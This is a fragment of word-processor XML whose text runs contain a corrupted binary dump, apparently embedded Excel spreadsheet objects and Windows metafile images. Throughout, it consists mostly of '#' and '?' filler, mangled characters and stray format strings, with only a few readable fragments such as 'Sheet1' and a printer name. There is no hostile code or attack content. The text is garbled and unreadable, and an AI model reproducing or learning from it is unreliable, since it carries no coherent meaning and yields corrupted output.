        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>T?y"###"###"###"###T###`###?###########(#######?$KA?)KA?###########L###############????????T###?QD???##"###"###"###T###d###F#######?###(#######?$KA?)KAF###########L###############????????T###?QD?b_#_"###"###"###"###T###d###?#######?###(#######?$KA?)KA?###########L###############????????T###???N?k?O"###"###"###"###T###`###?###########(#######?$KA?)KA?###########L###############????????T###T??|?N##"###"###"###T###d###8#######?###(#######?$KA?)KA8###########L###############????????T###T??|5u?"###"###"###"###R###p#######????############?######?####?[SO####################################################################?#?</w:t>
        <w:tab/>
        <w:t>??##??#0??##??##?#?</w:t>
        <w:tab/>
        <w:t>####&amp;#?#####??#0??##??##?#?</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> ###(?##??#0??######?#?</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> ###??#0??##?#?</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> #######??##</w:t>
        <w:br/>
        <w:t>?#0###################?####?[SO############################################################??#0########X?#####?#</w:t>
        <w:br/>
        <w:t>?####&amp;#?#?#</w:t>
        <w:br/>
        <w:t>?#!??#?</w:t>
        <w:tab/>
        <w:t>??#0z?#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:###1###{###Q#######?$KA?)KA:###1#######L###############????????P###2u?e!###!###T###X#######1###9###Q#######?$KA?)KA####1#######L###############????????P###5#0#########T###X###F###1###?###Q#######?$KA?)KAF###1#######L###############????????P###?sё!###!###T###d###\###1###?###Q#######?$KA?)KA\###1#######L###############????????T###1#0#0#%#################T###X###?###1###?###Q#######?$KA?)KA?###1#######L###############????????P###UO?m!###!###T###?###J###1#######Q#######?$KA?)KAJ###1#######L###############????????d###1#3#3#1#2#9#1#3#0#6#6###############################################T###X###:###Z###{###z#######?$KA?)KA:###Z#######L###############????????P###YN?e!###!###T###X###:###?###{###?#######?$KA?)KA:###?#######L###############????????P####N?e!###!###T###X###:###?###{###?#######?$KA?)KA:###?#######L###############????????P####N?e!###!###T###X###:###?###{###?#######?$KA?)KA:###?#######L###############????????P###</w:t>
        <w:br/>
        <w:t>b?e!###!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F###4###(###EMF+*@##$#########??###?###?##??###?###?F###########EMF+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?#####</w:t>
        <w:tab/>
        <w:t>###########???#######</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###################'#??##########'#??############???#####</w:t>
        <w:tab/>
        <w:t>#########'#??############???#####</w:t>
        <w:tab/>
        <w:t>#########,#########d#?#########'#??############???#####</w:t>
        <w:tab/>
        <w:t>#########,#########d#?#########?#??######?####?####????################################-#########</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#############2</w:t>
        <w:br/>
        <w:t>########???????####</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###############2</w:t>
        <w:br/>
        <w:t>##L#####?????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###############2</w:t>
        <w:br/>
        <w:t>##?#####???????####################2</w:t>
        <w:br/>
        <w:t>##?#####??????############</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#######2</w:t>
        <w:br/>
        <w:t>########?????########</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#######2</w:t>
        <w:br/>
        <w:t>##O#####????</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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########?#??######?####?####????#########################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???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  <w:br/>
        <w:t>###2</w:t>
        <w:br/>
        <w:t>##r#####50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???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100%###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???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###########2</w:t>
        <w:br/>
        <w:t>##V#####13312913066[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%#######???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5#######????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F#######????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W#######??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?#########?####?###"System##############################-#######?#######?#######'#??######################??#</w:t>
        <w:br/>
        <w:t>##???? #######?######F####Microsoft Office Excel ??????#####Biff8#####Excel.Sheet.8#?9?q##################################################################################################</w:t>
        <w:tab/>
        <w:t>#######? ?#??######?###?#?#####?###\#p####island                                                                                                       B###?#a#####?###=#####?#####?####</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>########################?#####?#####=###-#-#?#?#&lt;#######X#@#####?#####"###########?#####?#####1###?###??#####?g##?[SO1###?###??#######O#b#j#I#n#f#o#########################################################</w:t>
        <w:br/>
        <w:t>###????####################################B###########W#o#r#k#b#o#o#k#####################################################????????????####################################C###~#########S#u#m#m#a#r#y#I#n#f#o#r#m#a#t#i#o#n###########################(###</w:t>
        <w:tab/>
        <w:t>#######????####################################?###?#########D#o#c#u#m#e#n#t#S#u#m#m#a#r#y#I#n#f#o#r#m#a#t#i#o#n###########8###????????????####################################?###?#######?????###?###?###?????###?###?###?????????###?????????###?###?###?????###?###?###?????###?###?###?###?###?###?###?###?###?????###?###?###?###?###??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g##?[SO1###?###??#####?g##?[SO1###?###??#####?g##?[SO1###?###??#####?g##?[SO1###?###??#####?g##?[SO##+######"#??"###,#####0#;#"#??"#\#-###,#####0###5######"#??"###,#####0#;#[#R#e#d#]#"#??"#\#-###,#####0###7######"#??"###,#####0#.#0#0#;#"#??"#\#-###,#####0#.#0#0###A######"#??"###,#####0#.#0#0#;#[#R#e#d#]#"#??"#\#-###,#####0#.#0#0###i#*#2##_# #"#??"#*# ###,#####0#_# #;#_# #"#??"#*# #\#-###,#####0#_# #;#_# #"#??"#*# #"#-#"#_# #;#_# #@#_# ###.#)#)##_ * #,##0_ ;_ * \-#,##0_ ;_ * "-"_ ;_ @_ ##y#,#:##_# #"#??"#*# ###,#####0#.#0#0#_# #;#_# #"#??"#*# #\#-###,#####0#.#0#0#_# #;#_# #"#??"#*# #"#-#"#?#?#_# #;#_# #@#_# ###6#+#1##_ * #,##0.00_ ;_ * \-#,##0.00_ ;_ * "-"??_ ;_ @_ #########\$#,##0_);\(\$#,##0\)#########\$#,##0_);[Red]\(\$#,##0\)## ######\$#,##0.00_);\(\$#,##0.00\)##%### ##\$#,##0.00_);[Red]\(\$#,##0.00\)?#######?? ###########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?######### ###########? ?#####</w:t>
        <w:tab/>
        <w:t>#?? ##?########? ?#####,#?? ##?########? ?#####*#?? ##?########? ?#####+#?? ##?########? ?#####)#?? ##?########? ?#########"###########? ?######### ###########? ?#####</w:t>
        <w:tab/>
        <w:t>### ###########? ?####?#??####?#??####?#??####?#??####?#??####?#?`#####?###?#######Sheet1?###V#V#?###?###?8##?#?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??#N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>T?y###???N?k?O###T??|?N###T??|5u?###2u?e###YN?e####N?e####N?e###</w:t>
        <w:br/>
        <w:t>b?e#######?QD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#######?QD?b_#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?########?sё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</w:t>
        <w:br/>
        <w:t>#######UO?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</w:t>
        <w:br/>
        <w:t>?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##R###</w:t>
        <w:br/>
        <w:t>###</w:t>
        <w:tab/>
        <w:t>#######? ?#??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############????MbP?_#####*#####+#####?#####?###########%#######?###?#########?#####?#####M#n###M#i#c#r#o#s#o#f#t# #O#f#f#i#c#e# #D#o#c#u#m#e#n#t# #I#m#a#g#########?#?##/####</w:t>
        <w:tab/>
        <w:t>#####d#####?#####?#####L#e#t#t#e#r###########################################################################################################widm################?###########?###############################################################################################################?#"#</w:t>
        <w:tab/>
        <w:t>#d#########?#?#######??######??##U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</w:t>
        <w:br/>
        <w:t>#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#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</w:t>
        <w:br/>
        <w:t>#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#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?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>#######</w:t>
        <w:tab/>
        <w:t>###?#</w:t>
        <w:br/>
        <w:t>#######</w:t>
        <w:br/>
        <w:t>###?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########~#</w:t>
        <w:br/>
        <w:t>#########I@?#</w:t>
        <w:br/>
        <w:t>###########~#</w:t>
        <w:br/>
        <w:t>#########???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Pu#?#B?#</w:t>
        <w:br/>
        <w:t>###########?###################?#</w:t>
        <w:br/>
        <w:t>###########?###################?#</w:t>
        <w:br/>
        <w:t>###########?###################?#</w:t>
        <w:br/>
        <w:t>###########?###################?###?###d#T#X#"#"#"#&gt;###?#####@##############################?#####7###</w:t>
        <w:br/>
        <w:t>######?#####?#####################################################################################################################@#MSUD##Epson Stylus 800 ESC/P 2########?#######</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#######d#####?#"#</w:t>
        <w:tab/>
        <w:t>#d#########?#?#######??######??##U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</w:t>
        <w:br/>
        <w:t>#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#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</w:t>
        <w:br/>
        <w:t>#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#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</w:t>
        <w:br/>
        <w:t>##########################################G###############b###################0###################b###b###############??########################?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>#######</w:t>
        <w:tab/>
        <w:t>###?#</w:t>
        <w:br/>
        <w:t>#######</w:t>
        <w:br/>
        <w:t>###?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########?###################?#</w:t>
        <w:br/>
        <w:t>###########?###################?#</w:t>
        <w:br/>
        <w:t>###########?###################?#</w:t>
        <w:br/>
        <w:t>###########?###################?#</w:t>
        <w:br/>
        <w:t>###########?###################?###v###d#T#"#"#"#"#&gt;###?#####@###########?##########################?#####7###</w:t>
        <w:br/>
        <w:t>#####??##########################????Oh#??##+'??0###?###########@#######H#######X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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?#######?#######?###########szvc############island##########Microsoft Excel#@####o#{</w:t>
        <w:tab/>
        <w:t>#?#@####?z?#??#########################################################??###########################???.##??##+,??0###?###</w:t>
        <w:tab/>
        <w:t>#######P#######X#######h#######p#######x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szvc#########'##############################################Sheet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?????#########################################################################################??#</w:t>
        <w:br/>
        <w:t>##???? #######?######F####Microsoft Office Excel ??????#####Biff8#####Excel.Sheet.8#?9?q##################################################################################################??##########################????Oh#??##+'??0###?###########@#######H#######X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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?#######?#######?###########szvc############island##########Microsoft Excel#@####4C#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?#@###_#1#3#8#9#8#7#9#8#3#6###############################################????????#### #######?######F####0*#X???#0*#X???###############O#l#e#########################################################</w:t>
        <w:br/>
        <w:t>###????????????####################################?#############P#R#I#N#T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????####################################B#############C#o#m#p#O#b#j#####################################################????????????####################################?###j#########?;4#####</w:t>
        <w:tab/>
        <w:t>###~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###?#WMFC########L?########t#######t#######l###########?###|###########?;##3### EMF####t###?###################v####</w:t>
        <w:tab/>
        <w:t>##?###)###############?4##]?##F###,### ###EMF+#@############??####?###?###F###\###P###EMF+"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@############??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!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</w:t>
        <w:br/>
        <w:t>###############!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!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?###|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!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?###|###R###p#######????############?######?####?[SO####################################################################T/?</w:t>
        <w:tab/>
        <w:t>??##??#0??##??##V/?</w:t>
        <w:tab/>
        <w:t>####&amp;#?#####??#0??##??##T/?</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> ###(?##??#0??######T/?</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> ###??#0??##T/?</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> #######??##</w:t>
        <w:br/>
        <w:t>?#0###################?####?[SO############################################################??#0########X?#####n</w:t>
        <w:tab/>
        <w:br/>
        <w:t>?####&amp;#?#n</w:t>
        <w:tab/>
        <w:br/>
        <w:t>??</w:t>
        <w:tab/>
        <w:t>!ET/?</w:t>
        <w:tab/>
        <w:t>??#0z?#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?###1#######Q#######?$KA?)KA?###1#######L###############????????P###?Npe!###!###T###X###W###1###?###Q#######?$KA?)KAW###1#######L###############????????P###?k?O!###!###T###X###?###1#######Q#######?$KA?)KA?###1#######L###############????????P###?Npe!###!###T###X###1###1###r###Q#######?$KA?)KA1###1#######L###############????????P###?k?O!###!###T###X###?###1###?###Q#######?$KA?)KA?###1#######L###############????????P###?Npe!###!###T###X###2###1###s###Q#######?$KA?)KA2###1#######L###############????????P###?k?O!###!###T###X###?###1#######Q#######?$KA?)KA?###1#######L###############????????P###?Npe!###!###T###X###N###1###?###Q#######?$KA?)KAN###1#######L###############????????P###?k?O!###!###T###X###{###Z###?###z#######?$KA?)KA{###Z#######L###############????????P###8#6#########T###X#######Z###$###z#######?$KA?)KA####Z#######L###############????????P###2#5#########T###X###?###Z###?###z#######?$KA?)KA?###Z#######L###############????????P###2#9#########T###X###?###Z#######z#######?$KA?)KA?###Z#######L###############????????P###1#1#########T###X###X###Z###y###z#######?$KA?)KAX###Z#######L###############????????P###1#2#########T###T###?###Z#######z#######?$KA?)KA?###Z#######L###############????????P###3#?#####T###T######Z###?###z#######?$KA?)KA###Z#######L###############????????P###3#X#####T###T#######Z###&amp;###z#######?$KA?)KA####Z#######L###############????????P###0#T#####T###T###?###Z###?###z#######?$KA?)KA?###Z#######L###############????????P###0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?###S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########?###:#######?$KA?)KA############L###############????????T###XT?]?Npe!###!###!###!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#######?###*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|###?#######?###'#######?$KA?)KA?###########L###############????????\###'Y#N?N</w:t>
        <w:br/>
        <w:t>N?e#S#z?^!###!###!###!###!###!###!###!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#######?###*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|###?#######?###'#######?$KA?)KA?###########L###############????????\###ZS?X#???~L??y</w:t>
        <w:tab/>
        <w:t>?!###!###!###!###!###!###!###!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#######?###*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?#######d###'#######?$KA?)KA?###########L###############????????T###'Yf[,g?y!###!###!###!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#######?###*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|###?#######?###'#######?$KA?)KA?###########L###############????????\###Ux?X#?-N?~L??y</w:t>
        <w:tab/>
        <w:t>?!###!###!###!###!###!###!###!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?###|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?###}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amp;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6###########}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L###d###############|###############}###!#?###########??##########?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#######6#######?###}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L###d###?#######?###|###?###########{###!#?###########??##########?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#######6#######?###}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L###d###?#######?###|###?###########{###!#?###########??##########?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#######6##########}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L###d##########?###|##############{###!#?###########??##########?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#######6#######?###}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L###d###?#######?###|###?###########{###!#?###########??##########?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#######6#######?###}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L###d###?#######?###|###?###########{###!#?###########??##########?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*###+###6#######*###}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L###d###*###+###+###|###*###+#######R###!#?###########??##########?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!###+###6#######!###}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L###d###!###+###"###|###!###+#######R###!#?###########??##########?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+###6#######</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###}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L###d###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###+#######|###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###+#######R###!#?###########??##########?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,###+###6#######,###}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L###d###,###+###-###|###,###+#######R###!#?###########??##########?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6#######?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L###d###########?###############?#######!#?###########??##########?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###)###6#######?###)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L###d###?###)###?###*###?###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?###########??##########?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R###6#######?###R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L###d#######R###?###S#######R###?#######!#?###########??##########?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{###6#######?###{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L###d#######{###?###|#######{###?#######!#?###########??##########?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?###|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F###4###(###EMF+*@##$#########??###?###?##??###?###?F###########EMF+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?#####</w:t>
        <w:tab/>
        <w:t>###########???#######</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###################'#??##########'#??############???#####</w:t>
        <w:tab/>
        <w:t>#########'#??############???#####</w:t>
        <w:tab/>
        <w:t>#########,#########2#?#########'#??############???#####</w:t>
        <w:tab/>
        <w:t>#########,#########2#?#########?#??######?####?####????################################-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????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????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????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????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????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2</w:t>
        <w:br/>
        <w:t>##L#####????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????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????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#######</w:t>
        <w:br/>
        <w:t>###2</w:t>
        <w:br/>
        <w:t>%#2#####86####</w:t>
        <w:br/>
        <w:t>###2</w:t>
        <w:br/>
        <w:t>%#i#####25####</w:t>
        <w:br/>
        <w:t>###2</w:t>
        <w:br/>
        <w:t>%#?#####29####</w:t>
        <w:br/>
        <w:t>###2</w:t>
        <w:br/>
        <w:t>%#?#####11####</w:t>
        <w:br/>
        <w:t>###2</w:t>
        <w:br/>
        <w:t>%#?#####12####</w:t>
        <w:tab/>
        <w:t>###2</w:t>
        <w:br/>
        <w:t>%#4#####3###</w:t>
        <w:tab/>
        <w:t>###2</w:t>
        <w:br/>
        <w:t>%#l#####3###</w:t>
        <w:tab/>
        <w:t>###2</w:t>
        <w:br/>
        <w:t>%#?#####0###</w:t>
        <w:tab/>
        <w:t>###2</w:t>
        <w:br/>
        <w:t>%#?#####0#######?#########?####?###"System##############################-#######'#??##########-#########???#####</w:t>
        <w:tab/>
        <w:t>#########,#########"#B###########</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#############2</w:t>
        <w:br/>
        <w:t>########???????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-#######'#??##########-#########???#####</w:t>
        <w:tab/>
        <w:t>#########,###########?###B#######</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#############2</w:t>
        <w:br/>
        <w:t>##H#####?????????????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-#######'#??##########-#########???#####</w:t>
        <w:tab/>
        <w:t>#########,###########?###u#######</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#############2</w:t>
        <w:br/>
        <w:t>##y#####????????????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-#######'#??##########-#########???#####</w:t>
        <w:tab/>
        <w:t>#########,###############?#######</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#############2</w:t>
        <w:br/>
        <w:t>##?#####???????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-#######'#??##########-#########???#####</w:t>
        <w:tab/>
        <w:t>#########,###########u###########</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#############2</w:t>
        <w:br/>
        <w:t>########?????м?????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-#######'#??##########-#########???#####</w:t>
        <w:tab/>
        <w:t>#########,#########2#?#########-#######'#??##########-#########???#####</w:t>
        <w:tab/>
        <w:t>#########,#########3#?#########?#############-#########</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#############?###############-###################3#######?##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3###########-###########B#######3#B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2#####B#####-###########?#######3#?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2#####?#####-###################3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2###########-###########u#######3#u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2#####u#####-###########?#######3#?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2#####?#####-###########y#######3#y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"#####y#####-###########?#######3#?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"#####?#####-###########=#######3#=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"#####=#####-###########?#######3#?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"#####?#####-#####################?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?#########-###########C#########?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?###C#####-#########!#########!#?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?#!#######-#########2#########2#?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?#2#######?#############-#######?#######-#######'#??##########-#########???#####</w:t>
        <w:tab/>
        <w:t>#########,#########2#?#########-#######?#######'#??####################################################################################################################################################################################################################################################################O#b#j#I#n#f#o#############################################################????####################################?###########W#o#r#k#b#o#o#k#####################################################????????????####################################U#############S#u#m#m#a#r#y#I#n#f#o#r#m#a#t#i#o#n###########################(###########????####################################?###?#########D#o#c#u#m#e#n#t#S#u#m#m#a#r#y#I#n#f#o#r#m#a#t#i#o#n###########8###????????????####################################?###?#######</w:t>
        <w:tab/>
        <w:t>#######? ?#??######?###?#?#####?###\#p####island                                                                                                       B###?#a#####?###=#####?#####?####</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>########################?#####?#####=###-#-##$?#&lt;#######X#@#####?#####"###########?#####?#####1###?###??#####??##?[SO1###?###??#####??##?[SO1###?###??#####??##?[SO1###?###??#####??##?[SO1###?###??#####??##?[SO##+######"#??"###,#####0#;#"#??"#\#-###,#####0###5######"#??"###,#####0#;#[#R#e#d#]#"#??"#\#-###,#####0###7######"#??"###,#####0#.#0#0#;#"#??"#\#-###,#####0#.#0#0###A######"#??"###,#####0#.#0#0#;#[#R#e#d#]#"#??"#\#-###,#####0#.#0#0###i#*#2##_# #"#??"#*# ###,#####0#_# #;#_# #"#??"#*# #\#-###,#####0#_# #;#_# #"#??"#*# #"#-#"#_# #;#_# #@#_# ###.#)#)##_ * #,##0_ ;_ * \-#,##0_ ;_ * "-"_ ;_ @_ ##y#,#:##_# #"#??"#*# ###,#####0#.#0#0#_# #;#_# #"#??"#*# #\#-###,#####0#.#0#0#_# #;#_# #"#??"#*# #"#-#"#?#?#_# #;#_# #@#_# ###6#+#1##_ * #,##0.00_ ;_ * \-#,##0.00_ ;_ * "-"??_ ;_ @_ #########\$#,##0_);\(\$#,##0\)#########\$#,##0_);[Red]\(\$#,##0\)## ######\$#,##0.00_);\(\$#,##0.00\)##%### ##\$#,##0.00_);[Red]\(\$#,##0.00\)?#######?? ###########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?#######?? ##?########? ?######### ###########? ?#####</w:t>
        <w:tab/>
        <w:t>#?? ##?########? ?#####,#?? ##?########? ?#####*#?? ##?########? ?#####+#?? ##?########? ?#####)#?? ##?########? ?#########"##0##@ @ ##? ?######### ## ##@ @ ##? ?############0##@ @ ##? ?#########"##0##@ @ ##? ?####?#??####?#??####?#??####?#??####?#??####?#?`#####?###########Sheet1?###V#V#?###?###?8##?#?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##############XT?]?Np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#######'Y#N?N</w:t>
        <w:br/>
        <w:t>N?e#S#z?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#######'Yf[,g?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#######?Np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#######?k?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#######Ux?X#?-N?~L??y</w:t>
        <w:tab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#######ZS?X#???~L??y</w:t>
        <w:tab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?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tab/>
        <w:t>#######? ?#??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############????MbP?_#####*#####+#####?#####?###########%#######?###?#########?#####?#####M#n###M#i#c#r#o#s#o#f#t# #O#f#f#i#c#e# #D#o#c#u#m#e#n#t# #I#m#a#g#########?#?##/####</w:t>
        <w:tab/>
        <w:t>#####d#####?#####?#####L#e#t#t#e#r###########################################################################################################widm################?###########?###############################################################################################################?#"#</w:t>
        <w:tab/>
        <w:t>#d#########?#?#######??######??##U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</w:t>
        <w:tab/>
        <w:t>#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`##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########</w:t>
        <w:tab/>
        <w:t>###########</w:t>
        <w:tab/>
        <w:t>###################</w:t>
        <w:tab/>
        <w:t>###################</w:t>
        <w:tab/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>#####################?#</w:t>
        <w:br/>
        <w:t>#####################?#</w:t>
        <w:br/>
        <w:t>#####################?#</w:t>
        <w:br/>
        <w:t>###############################?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########?#&lt;########?U@####9@####=@####&amp;@####(@#####@#####@##############?#</w:t>
        <w:br/>
        <w:t>#d###(#n#z#&gt;###?#####@##############################?#*###########################################?#####7###</w:t>
        <w:br/>
        <w:t>#### #S#t#y#l#u#s# #8#0#0# #E#S#C#/#P# #2#####################?#@##f####</w:t>
        <w:tab/>
        <w:t>##?#######?#####?#####################################################################################################################@#MSUD##Epson Stylus 800 ESC/P 2########?#######</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#######d#####?#"#</w:t>
        <w:tab/>
        <w:t>#d#########?#?#######??######??##U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</w:t>
        <w:tab/>
        <w:t>#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>#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`##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########</w:t>
        <w:tab/>
        <w:t>###########</w:t>
        <w:tab/>
        <w:t>#########G#########</w:t>
        <w:tab/>
        <w:t>#####b#############</w:t>
        <w:tab/>
        <w:t>#####0###?#?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>#####################?#</w:t>
        <w:br/>
        <w:t>#####################?#</w:t>
        <w:br/>
        <w:t>#####################?#</w:t>
        <w:br/>
        <w:t>###############################?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########?#</w:t>
        <w:br/>
        <w:t>###########?###########################?#</w:t>
        <w:br/>
        <w:t>#@###(#n#z#&gt;###?#####@###########?##########################?#*###########################################?#####7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L?g#??#########################################################??###########################???.##??##+,??0###?###</w:t>
        <w:tab/>
        <w:t>#######P#######X#######h#######p#######x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szvc#########'##############################################Sheet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?????#######################??##########################????Oh#??##+'??0###H###########?#######?#######?###############$#######\#######?#######?###</w:t>
        <w:tab/>
        <w:t>###?#######?###</w:t>
        <w:br/>
